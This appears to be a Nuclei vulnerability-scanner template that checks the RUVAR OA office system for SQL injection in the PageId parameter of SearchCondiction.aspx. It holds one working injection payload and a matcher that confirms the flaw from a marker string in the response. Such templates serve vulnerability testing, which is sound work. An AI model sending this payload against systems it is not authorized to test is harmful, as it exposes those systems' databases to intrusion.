id: RUVAR-OA-sqli

info:
  name: 璐华ruvaroa协同办公系统SearchCondiction.aspx页面PageId参数存在sql注入漏洞
  author: Str1am
  severity: high
  tags: RUVAR,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/WebUtility/SearchCondiction.aspx?PageId=1%20and%201=(CHAR(113)%2bCHAR(122)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(122)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113))--"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "qzzkqzzkq"
        part: body
        condition: and
